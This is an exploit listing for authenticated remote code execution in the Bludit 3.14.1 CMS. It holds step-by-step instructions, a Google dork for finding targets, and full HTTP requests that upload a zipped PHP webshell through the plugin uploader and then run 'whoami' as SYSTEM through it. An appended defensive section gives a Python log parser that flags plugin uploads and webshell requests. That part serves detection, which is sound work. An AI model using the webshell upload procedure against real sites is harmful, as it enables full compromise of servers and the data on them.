## https://sploitus.com/exploit?id=PACKETSTORM:171619
# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)  
# Exploit Author: Alperen Ergel  
# Contact: @alpernae (IG/TW)  
# Software Homepage: https://www.bludit.com/  
# Version: 3-14-1  
# Tested on: Windows 11 WampServer | Kali Linux  
# Category: WebApp  
# Google Dork: intext:'2022 Powered by Bludit'  
# Date: 8.12.2022  
######## Description ########  
#  
# Step 1: Archive your webshell as a zip (example: payload.zip)  
# Step 2: Log in to an admin account and download 'UploadPlugin'  
# Step 3: Go to the UploadPlugin section  
# Step 4: Upload your zip  
# Step 5: Browse to target/bl-plugins/[your_payload]  
#  
######## Proof of Concept ########  
  
  
==============> START REQUEST <========================================  
  
POST /admin/plugin/uploadplugin HTTP/2  
Host: localhost  
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264  
Content-Length: 1820  
Origin: https://036e-88-235-222-210.eu.ngrok.io  
Dnt: 1  
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
  
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="tokenCSRF"  
  
b6487f985b68f2ac2c2d79b4428dda44696d6231  
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="pluginorthemes"  
  
plugins  
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="zip_file"; filename="a.zip"  
Content-Type: application/zip  
  
[binary ZIP data omitted; the archive's directory listing shows one folder, a/, containing a/a.php]  
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="submit"  
  
Upload  
-----------------------------308003478615795926433430552264--  
  
  
==============> END REQUEST <========================================  
  
## WEB SHELL UPLOADED!  
  
==============> START RESPONSE <========================================  
  
HTTP/2 200 OK  
Cache-Control: no-store, no-cache, must-revalidate  
Content-Type: text/html; charset=UTF-8  
Date: Thu, 08 Dec 2022 18:01:43 GMT  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4  
Pragma: no-cache  
Server: Apache/2.4.51 (Win64) PHP/7.4.26  
X-Powered-By: Bludit  
.  
.  
.  
.  
  
==============> END RESPONSE <========================================  
  
# REQUEST THE WEB SHELL  
  
==============> START REQUEST <========================================  
  
GET /bl-plugins/a/a.php?cmd=whoami HTTP/2  
Host: localhost  
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1  
Te: trailers  
  
==============> END REQUEST <========================================  
  
==============> START RESPONSE <========================================  
  
HTTP/2 200 OK  
Content-Type: text/html; charset=UTF-8  
Date: Thu, 08 Dec 2022 18:13:14 GMT  
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919  
Server: Apache/2.4.51 (Win64) PHP/7.4.26  
X-Powered-By: PHP/7.4.26  
Content-Length: 32  
  
<pre>nt authority\system  
</pre>  
  
==============> END RESPONSE <========================================
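From a defender's side, the two exchanges above leave a distinctive trace in the web server's access log: a POST to /admin/plugin/uploadplugin (a plugin install, which is a privileged event worth auditing on its own) followed by direct GET requests to a .php file under /bl-plugins/ with a query string. The script below is an added example, not part of the advisory and not Bludit's code. It parses Apache/nginx combined-format log lines, records plugin uploads per source IP, and flags any successfully served .php under /bl-plugins/, rating it high when the same IP uploaded a plugin within the preceding hour. The log lines, the one-hour window and the assumption that normal Bludit traffic never requests plugin .php files directly (plugin code is included by the application, not served as a page) are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format (Apache/nginx). Constructed sample lines for this example,
# modelled on the advisory's two requests; IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Dec/2022:18:01:43 +0000] "POST /admin/plugin/uploadplugin HTTP/2.0" 200 4210 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Dec/2022:18:05:10 +0000] "GET /bl-plugins/tinymce/tinymce.min.js HTTP/2.0" 200 511 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Dec/2022:18:13:14 +0000] "GET /bl-plugins/a/a.php?cmd=whoami HTTP/2.0" 200 32 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Dec/2022:18:13:40 +0000] "GET /bl-plugins/a/a.php?cmd=id HTTP/2.0" 200 40 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Dec/2022:18:30:00 +0000] "GET /bl-plugins/a/a.php?cmd=whoami HTTP/2.0" 200 32 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Dec/2022:09:00:00 +0000] "GET /bl-plugins/old/x.php HTTP/2.0" 404 210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

UPLOAD_PATH = "/admin/plugin/uploadplugin"          # Bludit's plugin upload endpoint (from the advisory)
# Assumption: legitimate traffic fetches only static assets under /bl-plugins/, never .php files.
PHP_UNDER_PLUGINS = re.compile(r'^/bl-plugins/[^?]+\.php(\?.*)?$', re.IGNORECASE)
CORRELATION_WINDOW = timedelta(hours=1)              # constructed tuning value


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_webshell_activity(log_text, window=CORRELATION_WINDOW):
    """Return a list of findings, in log order.

    kind == "plugin_upload":     a POST to the plugin upload endpoint (audit event).
    kind == "php_under_plugins": a served (HTTP 200) .php request below /bl-plugins/;
                                 severity is "high" when the same IP uploaded a plugin
                                 within `window` before it, otherwise "medium".
    """
    uploads = defaultdict(list)   # source ip -> timestamps of plugin uploads
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0] == UPLOAD_PATH:
            uploads[rec["ip"]].append(rec["ts"])
            findings.append({"kind": "plugin_upload", "ip": rec["ip"],
                             "path": rec["path"], "ts": rec["ts"]})
        elif rec["method"] == "GET" and rec["status"] == 200 and PHP_UNDER_PLUGINS.match(rec["path"]):
            recent_upload = any(timedelta(0) <= rec["ts"] - t <= window for t in uploads[rec["ip"]])
            findings.append({"kind": "php_under_plugins", "ip": rec["ip"],
                             "path": rec["path"], "ts": rec["ts"],
                             "severity": "high" if recent_upload else "medium"})
    return findings


if __name__ == "__main__":
    for f in find_webshell_activity(SAMPLE_LOG):
        print(f["ts"].isoformat(), f["kind"], f.get("severity", "-"), f["ip"], f["path"])
```

Run against the sample log, the upload from 203.0.113.5 is reported once, its two later shell requests are rated high, the same shell fetched from an unrelated address is rated medium, and the static asset and the 404 probe are ignored. Two points for anyone turning this into a real rule: plugin installation is privileged by design in Bludit, so the upload itself is only an audit event, and the real control is limiting who holds an admin session and how that session's key is protected; and the .php rule should be allow-listed against the site's installed plugins before alerting on it, since the regex deliberately matches every plugin script.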